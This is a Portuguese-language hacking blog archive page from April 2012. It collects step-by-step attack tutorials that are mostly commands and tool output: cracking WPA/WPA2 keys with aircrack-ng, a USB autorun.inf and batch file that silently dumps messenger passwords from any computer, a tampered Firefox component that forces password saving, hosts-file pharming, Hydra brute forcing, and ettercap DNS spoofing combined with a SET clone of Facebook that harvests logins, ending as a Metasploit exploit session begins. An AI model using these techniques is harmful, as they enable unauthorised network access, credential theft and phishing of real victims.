LinuxExploit: abril 2012

quinta-feira, 12 de abril de 2012

Como descobrir senha de roteador usando WPA/WPA2

Salve Galera...Estou como novo postador aqui do blog do meu amigo Waldemar ( Bin laden como eu chamo)então vou está postando um tutorial que eu fiz para uma matéria na facu de segurança e resolvi mostrar a invasão em um roteador usando WPA/WPA2 usando o backtrack5 e resolvi compartilhar com vocês tambem
OBS: verifique se sua placa de rede é compativel para fazer todo o procedimento
(lembrando que não vou ensinar o que cada parâmetro o que faz)

Para fazer o processo vamos precisar

- backtrack 5
-wordlist com suporte ao aircrack-ng

primeiramente vamos aos comandos:

Código:

airmon-ng

airmon-ng start wlan0

airodump-ng mon0

airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0

airplay-ng -1 0 -a (BSSID) mon0 
aircrack-ng (File directory)

aircrack-ng -w (wordlist directory) (File directory)

Vamos agora passo-a-passo seguindo os códigos acima:

começaremos com os dois primeiros comando:

Código:

airmon-ng

aqui ele vai mostrar o nome da minha placa de rede e dar o nome de wlan0

Código:

airmon-ng start wlan0

após esse comando ele coloca a placa em modo monitor e habilita o nome de mon0

agora vamos ver as redes por perto com o comando:

Código:

airodump-ng mon0

(Podemos ver o BSSID o canal e o MAC ( que vamos chamar de BSSID nos comandos de agora em diante) do roteador...por hora vamos gravar o endereço MAC e o canal)
(Temos que observar que abaixo de STATION existe um endereço MAC que é o de alguem usando a rede...temos que lembrar que precisamos de pelo menos 1 endereço usando a rede, caso contrario não é possivel continuar)

vamos começar a monitorar uma rede especifica e pegar pacotes

Código:

airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0

file name é o nome que você vai dar para o arquivo de captura criado com o parâmetro -w..
(nomalmente esse arquivo é criado na pasta root com a extensão .cap)

Agora vamos pedir uma autentificação com o comando

airplay-ng -1 0 -a (BSSID) mon0

como observado acima a autentificação foi aceita..

agora podemos tentar crackear..então usaremos o comando

aircrack-ng (file directory)

se o resultado obtido for "WPA( 1 handshake) você pode continuar...caso ao contrario tente novamente com mais pacotes capturados

para finalizar vamos tentar descrobrir a senha por brute force usando uma wordlist

Código:

aircrack-ng -w (wordlist directory) (File directory)

descoberta a senha que no nosso caso é "password".... é só correr para o abraço

Wordlist usada: Download Wordlist

segunda-feira, 2 de abril de 2012

Roubando senhas de MSN/Yahoo/Gtalk(orkut) com o pendrive

Roubando senhas de MSN/Yahoo/Gtalk (orkut) com pen drive!

É bastante simples, primeiramente baixe o mspass. Para aqueles que gostam de baixar direto da fonte, baixe aqui:

http://www.nirsoft.net/utils/mspass.html

Abre o pendrive e crie um documento chamado “autorun.inf”.
Nele escreva isso:

[autorun]
open=captura.bat
ACTION=darkers

Renomeie o disco do seu pendrive para o mesmo nome que esta na propriedade ‘Action.”

Ex: Se estiver com o nome “Disco Removível” e no Action tiver “darkers”, clique com o botão direito sobre o ícone do pendrive e clique em Renomear e ponha “darkers” no nome.

Então crie uma pasta chamada mspass, nessa pasta você copia o mspass.exe que você baixou. *Não a instalação e sim o .exe do programa! (Isso somente para quem optou por baixar a instalação dele na fonte logo acima.)

Então você cria um arquivo .bat, que é chamado captura.bat. Nesse arquivo você escreve:

start mspass\mspass.exe /stext Senhas.txt

OK! Isso é tudo que você tem que fazer. Você colocar o o seu pendrive em qualquer computador, o autostart.inf executará o mspass. Depois de alguns segundos, você pode remover o pendrive. Depois disso, aparecerá um arquivo chamado Senhas.txt no seu pendrive, com as senhas que o Mspass pegou!

-O Mspass é um programa que decodifica senhas de MSN (e de alguns outros softwares também, como Yahoo Messenger), descobrindo a senha de usuários que ja logaram no computador que ele for executado.

-O arquivo captura.bat serve para salvar todo texto do mspass em um arquivo .txt, ou seja, ele vai salvar o login e senha no .txt.

Creditos : Forum Darkers

Transformando o Firefox em um Keylogger

Vamos ver como trnasformar o Firefox em um keylogger muito útil.

Técnica descoberta por RAJ.

A tecnica consiste forçar o uso o proprio armazenamento de senhas do Firefox, muito simples!
Não é necessário nenhum programa, apenas substituir o javascript original por um modificado, a modificação faz um bypass que força o armazenamento da identidade.
E o melhor, é cross platform… funciona em todos sistemas operacionais!

Como?

1 – Feche o firefox.

2 – No Windows, vá em: C:/Arquivos de programas/Mozilla Firefox/Components
Linux, por exemplo em: /usr/lib/firefox-3.6.3/components/
Mac: Applications > botão direito no Firefox > Show Package Contents > Contents/MacOS/Components.

3 – Iremos substituir o script chamado “nsLoginManagerPrompter.js” pelo bypassed, baixe a modificação aqui, talvez vc queira copiar o original antes de substituir pelo modificado.

Uma vez substituido, está pronto!
Agora o Firefox irá armazenar automaticamente todas informações de login!

Para ver esses dados abra o Firefox, Editar, Preferencias / aba Segurança e clique em “senhas salvas”…. pronto, está tudo ai!

Espero que seja útil a vocês, Abraços
Reeves

Recuperando senhas gravadas no navegador

Existem softwares para recuperação de senhas gravadas em inputs do tipo password, neste caso não vamos utilizar nenhum programa externo, apenas javascript e umnavegador (testado apenas no FF).

O primeiro passo é acessar o site e fazer com que a senha seja carregada no campo de password, em alguns casos é necessário digitar o usuário para que isto aconteça.

Feito isso, carregue o jQuery no site através do campo da url:

javascript:var%20script=document.createElement(“script”);script.type=”text/javascript”;
script.src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js“;
document.getElementsByTagName(“head”)[0].appendChild(script);void(0);

Sabendo que agora você pode usar os recursos do jQuery, você precisa encontrar o input do tipo password e exibir o atributo “value” dele, o código que faz isso:

javascript:alert($(“input[type=password]“).val())

Simples assim, este comando deve abrir um alert com a sua senha.

Pharming Windows

A técnica de Pharming no Windows se baseia em trocar os DNS’s de um arquivo, fazendo assim, você acessar um site sem a intenção de fazer aquilo.

O arquivo é o C:\Windows\System32\drivers\etc e possui uma lista de DNS’s com endereços de IP.

O que ele faz?

Ele simplesmente faz o seguinte:
Quando você digita 127.0.0.1, ele abre o endereço localhost automaticamente… E na barra de endereços, o endereço fica 127.0.0.1.

Pera ae… Isso quer dizer que eu posso fazer a vítima acessar um site, o site aparecer corretamente na barra de endereços e a vítima estar acessando outro site? CORRETO!
Abrindo o arquivo com o bloco de notas, podemos ver:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
127.0.0.1 localhost

Agora, vamos pegar por exemplo, o IP de Google.com e o DNS de Orkut.com e adicionar no arquivo (assim, quando a você tentar acessar o Orkut, você vai cair no Google).

Dando um ping www.google.com, temos:

Disparando www.l.google.com [64.233.163.104] com 32 bytes de dados:
Resposta de 64.233.163.104: bytes=32 tempo=50ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=45ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=46ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=49ms TTL=56

Agora, pegamos o IP do Google.com (64.233.163.104) e acrescentamos, junto ao DNS do Orkut.com, no arquivo hosts.

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
127.0.0.1 localhost
64.233.163.104 www.orkut.com

Pronto! Agora, quando você for acessar Orkut.com, vai abrir a página do Google.com (na barra de endereços, continuará Orkut.com).

Assim, se você fizer isso com uma página fake, a vítima verá a barra de endereçõs idêntica, mas estará logando em outro site! Isso foi apenas para explicar como funciona o Pharming (Windows) com um pouco de imaginação e SEing, ai ai…

Credito : Forum Darkers

Ataque Brute Force com Hydra

Sobre os Ataques brute force : o atacante tenta adivinhar a senha por tentativa e erro testando várias combinações de usuários e senhas (disponíveis em listas que podem ser encontradas na Internet ou baseando suas tentativas em dados que conseguiu utilizando engenharia social ou por conhecer a vítima do ataque) para tentar logar em um determinado serviço no qual ele não tem autorização, obtendo um shell em um servidor por exemplo.

Efetuar este tipo de ataque é bem demorado e pode ser facilmente impedido por administradores que utilizem técnicas como limitar o número de tentativas erradas utilizando um determinado nome de usuário. Porém, existem várias ferramentas que fazem com que estes ataques sejam efetuados de modo mais eficiente, uma delas é o THC Hydra.

THC Hydra

O Hydra tem um desempenho muito bom (utiliza threads paralelas, dividindo as senhas e nomes de usuários entre estas threads diminuindo o tempo levado para ele conseguir adivinhar a senha) e consegue efetuar com sucesso ataques brute force nos protocolos TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2, Cisco AAA. Além disso, está em constante desenvolvimento e é completamente gratuito com o código-fonte 100% disponível. Ele ainda possui uma interface gráfica, o HydraGTK. Ela é completamente independente do software e não precisa ser compilada para que você consiga utilizá-lo. Porém, sem ela você só poderá utilizá-lo através da linha de comando.Você pode utilizar o Hydra em qualquer Unix como Linux, *BSD, Solaris, etc; Mac Os/X; no Windows utilizando o Cygwin; em dispositivos móveis que utilizem processadores ARM e Linux e em dispositivos que utilizem o PalmOS.

Site Oficial: http://freeworld.thc.org/thc-hydra/

Seguem os links para que você possa fazer o download:
Para Unix: http://www.thc.org/releases/hydra-7.1-src.tar.gz
Para Windows/Cygwin: http://www.thc.org/thc-hydra/hydra-5.4-win.zip
Binário para o ARM: http://www.thc.org/thc-hydra/hydra-5.0-arm.tar.gz. Esta versão está um pouco desatualizada, mas em breve será disponibilizada uma nova versão.

Binário para o Palm: http://www.thc.org/thc-hydra/hydra-4.6-palm.zip. A versão para o Palm é desenvolvida de forma independente das outras, portanto nem todos os protocolos são suportados e os updates não são muito frequentes.

Compilando e instalando

Dependendo do pacote que você escolher, será necessário que você compile o software. Algumas releases como a disponível para Windows/Cygwin e ARM já contém tudo compilado e pronto para o uso, com todos os módulos (no port para o ARM você não poderá usar o módulo para SAP R/3).
Se você escolheu o pacote para Unix, você precisará instalar todas as bibliotecas necessárias para compilar os módulos corretamente. O serviço não é tão difícil, já que ao executar o ./configure, já será mostrado um resumo dizendo as bibliotecas que faltam e onde encontrá-las. Seguem os passos necessários para compilar com sucesso o Hydra em qualquer *nix.
Faça o download do pacote hydra-5.4-src.tar.gz aqui no www.darkers.com.br e descompacte:

Código:tar xzvf hydra-5.4-src.tar.gz

Acesse o diretório que acabou de ser criado e:

Código:
cd hydra-5.4-src./configure

Quando você executa o configure, algumas bibliotecas que são necessárias para alguns módulos como SSHv2 e PostgreSQL (libssh e libpq, respectivamente) são checadas e se não estiverem instaladas no sistema você deverá instalá-las na mão. A boa notícia é que o script já informa o site de onde você pode fazer o download e a maioria dessas bibliotecas já vem com instruções de como compilar. Vale a pena lembrar que, se você não quiser utilizar os módulos que precisam das bibliotecas, pode continuar a compilação normalmente: os outros protocolos irão funcionar sem problemas.
Depois que o ./configure terminar, só resta executar como root:

Código:
make && make install

Pronto! O Hydra já está instalado e pronto para ser usado!
Wordlists

Wordlists são, como o nome diz, listas gigantescas de palavras ou nomes de usuários que são utilizadas em ataques bruteforce. O Hydra não vem com nenhuma wordlist e não funciona sem uma, então você precisa dar um jeito nisso. Vou colocar alguns links com wordlists para você começar a brincar com o Hydra

http://www.outpost9.com/files/WordLists.htmlhttp://wordlist.sourceforge.net/

Depois que você baixar as listas, junte todas em um único arquivo. No Hydra, você só pode especificar um único arquivo de wordlists para ser utilizado. Você pode usar o cat. Por exemplo:
Código:
cat substitua isso por todos os arquivos de wordlists que você tem >> wordlist2.txt
É útil também remover entradas duplicadas da sua wordlist, para não perder tempo tentando mais de uma vez uma senha que já não deu certo:

Código:cat wordlist2.txt | sort | uniq > wordlistfinal.txt

Pronto, agora é só fazer o Hydra utilizar o arquivo wordlistfinal.txt como wordlist.

Utilizando o Hydra

O Hydra é bem fácil de ser utilizado. Você só precisa especificar o login (ou um arquivo com vários logins), a wordlist com senhas, o host e o protocolo. Se desejar pode fazer com que a saída do comando seja escrita em algum arquivo. Na linha a seguir, mostro o uso básico do Hydra:

Código:hydra -l root -P ~/wordlistfinal.txt -o bruteforce.txt ftp.foo.bar ftp

A linha acima é bem simples. A opção -l diz que você quer fazer brute force em um usuário específico que você já sabe que existe (você poderia usar a opção -L para utilizar um arquivo com vários logins); a opção -P específica qual wordlist será usada para ler as senhas (você poderia usar -p se soubesse uma senha, mas não soubesse de qual usuário é); -o escreve a saída do comando no arquivo bruteforce.txt; ftp.foo.bar é o nome do host que iremos atacar e ftp é o protocolo que o Hydra deve usar.

Se você por algum motivo precisar interromper a sessão do Hydra, pode começar de onde parou utilizando a opção -R no mesmo diretório em que você interrompeu a execução anterior.

Outras opções úteis são:

-s: Se o serviço estiver sendo executado em uma porta diferente, use esta opção para especificar a porta.
-t: Indica a quantidade de conexões paralelas no servidor
-M: Define uma lista de servidores a serem atacados
Como se proteger

Se proteger de ataques brute force não é tão difícil assim:

Forçar utilização de senhas seguras nos seus servidores. Senhas com caracteres especiais, letras maiúsculas e minúsculas, números e um comprimento de pelo menos 8 caracteres.

Determinar um número máximo de erros na tentativa de login.

Sempre monitore os log’s procurando por tentativas de login que falharam muitas vezes.

Onde puder, mude a porta padrão dos serviços sendo executados na sua máquina (por exemplo, se só você utilizar o SSH você pode mudar a porta dele de 22 para 45600, por exemplo. Isso diminui a incidência de ataques)

Onde possível, especifique o IP de origem que pode estabelecer a conexão com determinados serviços

Como se vê, é bem simples melhorar a segurança de seus serviços. Isso é o mínimo necessário para não ter muita dor de cabeça com qualquer pessoa que saia usando o Hydra e seus similares por aí. Porém estas não são as únicas técnicas e também não excluem a necessidade de verificação contínua nos log’s e conexões estabelecidas no servidor procurando por atividades suspeitas.

Conclusão

O Hydra é talvez a melhor ferramenta para ataques de brute force: tem um ótimo desempenho, é multiplataforma e várias opções úteis, além disso está em desenvolvimento constante e novas versões são lançadas frequentemente (não há um ciclo de release definido).

Creditos : Forum Darkers

A-MAC Address Change

Uma boa ferramenta para quem gosta de Wireless Hacking é o bom e velho MAC Address Changer,
Hoje em dia praticamente todos os provedores de acesso wireless liberam o acesso aos seus clientes atáves do seu MAC Address.
Tendo ele em mãos, basta clona-lo.

Download | Site Oficial

DNS Spoofing

Author: Marcelo dos Santos Moraes Junior

--Sumário--
0x01 - O que é o DNS ?
0x02 - Tecnologias de Redes sem Fio
0x03 - DNS Spoofing
0x04 - Conclusão
------------------------------------

0x01 - O que é DNS ?

  Na década de 80 a difusão da internet comecou a se tornar algo preocupante. Para ter
acesso a um determinado servidor ou máquina nós teriamos que saber o IP da máquina no qual
gostariamos de ter acesso, assim com os surgimentos de Web-Sites era estremamente complicado
ficar decorando enderecos de IP. Como todos sabems o IP é localizado na Camada de Rede e a 
sua principal funcão é mostrar onde está a máquina fisicamente para termos uma conexão.
  Em 1984 viram que estava ficando complicado a coisa então criaram uma coisa magnífica
chamada de DNS (Domain Name System) (: também chamado de nome de domínio. O DNS veio para
facilitar a nossa vida, agora todo IP tem um Nome ahhh =) Ao acessar um determinado DNS
ele é traduzido para o seu endereco real de IP para ser encontrada a máquina desejada
claro que o usuário não ve isso acontecer. Por exemplo www.google.com.br está
associado ao IP 74.125.229.183 então podemos acessa-lo por ambos "enderecos".
  No mundo temos o Total de 13 DNS globais com a finalidade de responder as requisicões
para as máquinas que vão acessar determinados IPs, chamamos também essa tarefa de 
resolucão de DNS.
  Creio que agora ficou claro para todos essa pequena explicacão sobre DNS, pois o cérebro
humano decora muito mais fácil nomes do que números!!

0x02 - Tecnologias de Redes sem Fio

  É claro se vamos falar de DNS Spoofing não posso deixar passar batido e não falar sobre
Redes sem Fio, hoje quem não tem em casa um ponto de acesso de rede sem fio ?? (= Mas cuidado
elas podem ser bem perigosas, mas todo brasileiro tem a mania de dizer ahh você acha que aqui
perto de casa vai ter alguém que saiba "invadir" redes Wi-Fi ?? Aqui perto de casa só tem 
comércio, é ai que você se engana. Não podemos garantir total seguranca porque quem está
por trás delas são seres humanos e pessoas erram!! Garanto que muitos já acessaram provedores
de internet da sua cidade através de um Acces Point de rede sem fio... Bem além dos 
tipos de criptografias que elas utilizam, também usam as vezes filtro por IP e
MAC blábláblá e um monte de baboseiras, como disse antes não tem como garantir a seguranca
mas da para complicar ou vencer pelo cansaco.
  Bem Wi-Fi como todos conhecem é um conjunto de especificacões de redes sem fio baseado no
padrão IEEE 802.11, não vou falar sobre o IEEE agora, mas vou deixar nas referencias para os
curiosos que querem dar uma olhada... O Wi-Fi surgiu devido a necessidade de utilizar de redes
sem a necessidade de cabos, o sinal é transmitido através de um Access Point utilizando de 
radiofrequência.
  Cada rede sem fio tem um SSID (Service Set Identifier) ou seja cada rede recebe um nome de
identificacão, existem vários padrões de redes sem fio 802.11, 802.11a, 802.11b... mas isso
não vai interessar para nós agora.

-------------------
--------WEP--------
-------------------

  Com o surgimento das redes sem fio era necessário criar uma forma de terem seguranca nos
dados que são trafegados e também garantir que nenhum acesso indevido seja feito, então criaram
WEP (Wired Equivalent Privacy) não vou falar muito do seu funcionamento mas no próximo artigo 
que irei escrever será sobre Wi-Fi Cracking ai detalho mais sobre. A grande falha de se usar
WEP se dá devido ela utilizar apenas 1 chave tanto para encriptar e desencriptar os dados trafegados.
  Essa tecnologia usa criptografia RC4 de 64 ou 128 bits, sendo 24bits de vetor de inicializacão
com isso a chance da repeticão acontecer é realmente alta e como utiliza de chave única, assim 
podemos quebrar a chave e acessar a rede sem problemas.

-------------------
--------WPA--------
-------------------

  Bem com a preocupacão da seguranca em redes sem fio e perceberam que as redes estavam sendo
violadas facilmente mesmo utilizando WEP, resolveram criar a sua evolucão no qual foi chamada
de WPA (Wired Protected Access) . Ela usa uma chave de 128 bits e para gerar essa chave usa
do endereco de MAC com isso temos mais seguranca pois como o MAC é único as coisas complicam.
  Ai perceberam também que utilizar do conceito de chave única não era muito seguro assim 
implantaram um protocolo chamado TKIP (Temporal Key Integrity Protocol) com a finalidade de 
trocar a chave de tempos em tempos assim garantindo maior a seguranca mas nada que não possa
ser quebrado, só gastar um tempinho hehehe.

-------------------
--------WPA2-------
-------------------

  Essa foi a evolucão da WPA, utiliza de chave de 256 bits e o protocolo chamado AES
(Advanced Encryptation Standart) + TKIP, sendo assim é mais seguro porém tem uma perda
de desempenho de velocidade da rede. Não vou dar mais detalhes, para aqueles curiosos no próximo
artigo vou escrever sobre todas elas detalhando.

-------------------
-----Wi-Fi ??------
-------------------

  Vocês devem estar se perguntando porque falei de redes Wi-Fi nesse artigo né? Vamos aos fatos.
  Hoje em dia a técnica chamada de "DNS Spoofing" tem sido muito utilizada na WEB principalmente
detro de redes sem fio devido a facilidade de ganhar acesso a rede. Vou dar um exemplo claro e simples.
  Em várias cidades temos empresas que oferecem servicos de provedor de rede sem fio, aqui pelo menos
na minha cidade tem alguns, tem os legais e os ilegais (piratas rsrsrs), alguns utilizam WPA + liberacao por
MAC, mas nada que não se resolva com 2 ou 3 comandos no terminal (= Bem você já pensou se conseguir 
acesso a um servidor desses o que pode ser feito ?? Podemos spoofar por exemplo o endereco do facebook
e jogar o acesso para nossa máquina e pegar a senha de todos... Ou até mesmo ganhar uma sessão via
Meterpreter. Marcelo não entendi nada que você disse agora, bem eu dei uma passada da carroca na frente
dos bois então continuem lendo que irão entender.

0x03 - DNS Spoofing

  A palavra spoof ao pé da letra quer dizer enganar, passar para trás, e é bem isso que o ataque consiste.
  DNS spoofing se da de fazer alteracão na tabela hostname-ip address, essa tabela informa a rota que 
será feita daquele endereco de DNS para aquele determinado IP, assim alterando o endereco dessa tabela
podemos redirecionar para onde quisermos. Basicamente é isso que iremos fazer logo abaixo, mas Marcelo
o que pode ser feito com isso? Muitas coisas hehehe, entre elas podemos criar uma página falsa do facebook
e quando a pessoa entrar cai na sua página que está rodando em um determinado servidor. Podemos até criar
uma sessão dependendo, mas o perigo fica geralmente quando é para retirar informacões confidenciais como
dados bancários por exemplo, clonar uma página de banco e spoofar o endereco de DNS para a página clone
vai da criatividade e do objetivo de cada um.

-------------------
-----Ettercap------
-------------------

  O Ettercap é um poderoso sniffing com várias funcionalidades, e o melhor ele trabalha com vários protocolos
entre eles TCP, SSH, HTTPS, IRC, VNC entre outros. Não vou falar muito sobre ele, no final tem referencias 
para leitura =D.

-------------------
----Instalando-----
-------------------
  Bem, eu utilizo a distribuicão BackTrack 5 R2, ela já vem com todas as ferramentas que vamos utilizar abaixo,
mas para aqueles que usam de Ubuntu/Debian vamos a um passo a passo.

  Para instalar o Ettercap é realmente simples, se você utiliza Ubuntu/Debian:

  $sudo apt-get install ettercap

  Após instalado ele já está pronto para uso. O Ettercap tem sua interface gráfica e a sua interface modo texto,
nesse artigo vou estar usando a interface modo texto. Agora vamos ao Help do Ettercap para ele nos mostrar os
parametros, para isso vamos ao shell:
  
 $ettercap -help                                                                                                                      
                                                                                                                                               
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA                                                                                               


Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -u, --unoffensive           do not forward packets
         .
  .
  .

  Vão se deparar com uma tela parecida com essa, nela é mostrado todos os tipos de parametros que podem ser
usados no ettercap e para que servem.

  A sua sintaxe é muito simples, se resume em : ettercap opcoes alvo, podendo combinar vários comandos.

-------------------
----Metasploit-----
-------------------

  O Metasploit Framework é uma poderosa ferramenta para efetuar PenTest contendo diversos exploits e Payloads
e também um excelente framework para desenvolvimento de exploits.

-------------------
----Instalando-----
-------------------

  Para efetuar a instalacão Ubuntu/Debian:

  $sudo apt-get install metasploit

  ou

             ---32 bits---
  $wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
  $chmod +x metasploit-latest-linux-installer.run
  $./metasploit-latest-linux-installer.run

             ---64 bits---
  $wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
  $chmod +x metasploit-latest-linux-x64-installer.run
  $./metasploit-latest-linux-x64-installer.run

  Após a instalacão para entrar em modo console:
   
  $msfconsole

-------------------
---DNS Spoofing----
-------------------

  Vamos lá, utilizaremos o ettercap para efetuar o spoofing, para isso vamos passo a passo. Primeiramente
antes de mais nada precisamos editar o etter.dns nele vamos configurar o "redirecionamento" spoofing.

  $locate etter.dns
  $/usr/local/share/ettercap/etter.dns
  $nano /usr/local/share/ettercap/etter.dns

  Encontre as seguintes linhas:

  ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#

microsoft.com      A   192.168.1.185
*.microsoft.com    A   192.168.1.185
www.microsoft.com  PTR 192.168.1.185      # Wildcards in PTR are not allowed

##########################################

  Vamos configurar o redirecionamento. Nesse exemplo vamos spoofar o facebook.com:

   ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
                       
facebook.com      A   10.1.1.7
*.facebook.com    A   10.1.1.7
www.facebook.com  PTR 10.1.1.7      # Wildcards in PTR are not allowed

##########################################

  Atencão é preciso colocar o IP para onde vai ser spoofado no meu caso para a minha máquina (10.1.1.7).
Para saber o seu ip:

  $ifconfig eth0
  ou se está usando de interface wifi
  $ifconfig wlan0

  Para salvar o arquivo CTRL+O e para sair CTRL+X

  Vamos iniciar o ataque, o ettercap tem vários plugins e um deles é o dns_spoof o qual vamos utilizar para
efetuar o redirecionamento. 

  $ettercap -T -q -M arp -i wlan0 -P dns_spoof //

  - Modo Texto -T
  - Execucão em modo promiscuo -q
  - Redirecionamento MITM (Man in The Middle) -M arp
  - Interface de rede -i wlan0 
  - Plugin -P dns_spoof

  No meu caso estou usando a interface Wi-Fi pois estou no notebook =)

  Agora todos da rede que tentarem acessar o facebook.com irão ser redirecionados para a minha máquina. Observem:

  Activating dns_spoof plugin...
  dns_spoof: [www.facebook.com] spoofed to [10.1.1.7]

  Vamos brincar um pouco por exemplo tem uma tools de engenharia social chamada SET e ela tem várias opcões, 
uma delas é efetuar Clones de páginas.
  
  $cd /pentest/exploits/set
  $./set

  E vamos ter a seguinte página:

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |   
                 /        \ |        \  |    |   
                /_______  //_______  /  |____|   
                        \/         \/            

  [---]        The Social-Engineer Toolkit (SET)         [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                 Version: 3.1.3                   [---]
  [---]            Codename: 'User Awareness'            [---]
  [---]         Report bugs: davek@secmaniac.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

         Help support the toolkit, rank it here:
  http://sectools.org/tool/socialengineeringtoolkit/#comments

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

  As opcoes que vou utilizar são as seguintes: 1 - 2 - 3 - 2 e vamos ter a seguinte página:

set:webattack>2
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:

  Agora vamos setar o site a ser clonado no nosso caso o facebook. 

set:webattack>2
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com 

  OBS: Não se esquecam de para o ettercap antes pois se não ao tentar capturar a página o 
endereco vai ser spoofado.

  Vocês vão reparar que a ferramenta SET não é apenas uma simples ferramenta mas também uma 
ferramenta que funciona como "Keylogger" ele captura todos os eventos http POST e http GET :D
  Agora vou acessar o facebook de outra máquina: 10.1.1.8 e preencher os campos de login e 
senha e ver o que acontece nos logs do ettercap e do SET.

 - Logs Ettercap
Activating dns_spoof plugin...

HTTP : 10.1.1.7:80 -> USER: marcelomoraes@123.com  PASS: senha123  INFO: http://www.facebook.com/

  - Logs SET
10.1.1.8 - - [31/Mar/2012 22:03:02] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVr7yhLO                                                                           
PARAM: return_session=0                                                                       
PARAM: legacy_return=1                                                                        
PARAM: display=                                                                               
PARAM: session_key_only=0                                                                     
PARAM: trynum=1                                                                               
PARAM: charset_test=?,´,?,´,?,?,?                                                            
PARAM: timezone=                                                                              
PARAM: lgnrnd=180100_TMwd                                                                     
PARAM: lgnjs=n                                                                                
POSSIBLE USERNAME FIELD FOUND: email=marcelomoraes@123.com                                    
POSSIBLE PASSWORD FIELD FOUND: pass=senha123                                                  
PARAM: default_persistent=0                                                                   
POSSIBLE USERNAME FIELD FOUND: login=Entrar                                                   
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

  Bingo temos login e senha =D

  Bem vamos agora fazer algo mais interessante como ter acesso a máquina =D para isso vou 
estar utilizando o nosso querido Metasploit e aproveitar de uma falha no Internet explorer
para ganhar uma sessão Meterpreter. O exploit a ser utilizado é o seguinte: ms10_002_aurora

  Let's GO!!!!

  $msfconsole
  
  +-------------------------------------------------------+                                   
  |  METASPLOIT by Rapid7                                 |                                   
  +---------------------------+---------------------------+                                   
  |      __________________   |                           |                                   
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |                                   
  |             )=\           | |  EXPLOIT   \            |                                   
  |            // \\          | |_____________\_______    |                                   
  |           //   \\         | |==[msf >]============\   |                                   
  |          //     \\        | |______________________\  |                                   
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |                                   
  |        //         \\      |  *********************    |                                   
  +---------------------------+---------------------------+                                   
  |      o O o                |        \'\/\/\/'/         |                                   
  |              o O          |         )======(          |                                   
  |                 o         |       .'  LOOT  '.        |                                   
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                   
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                   
  | |________________|__|)__| |    |     __||_)     |     |                                   
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                   
  |  = = = = = = = = = = = =  |     '--------------'      |                                   
  +---------------------------+---------------------------+                                   
  


       =[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14805 updated 38 days ago (2012.02.23)

Warning: This copy of the Metasploit Framework was last updated 38 days ago.
         We recommend that you update the framework at least every other day.
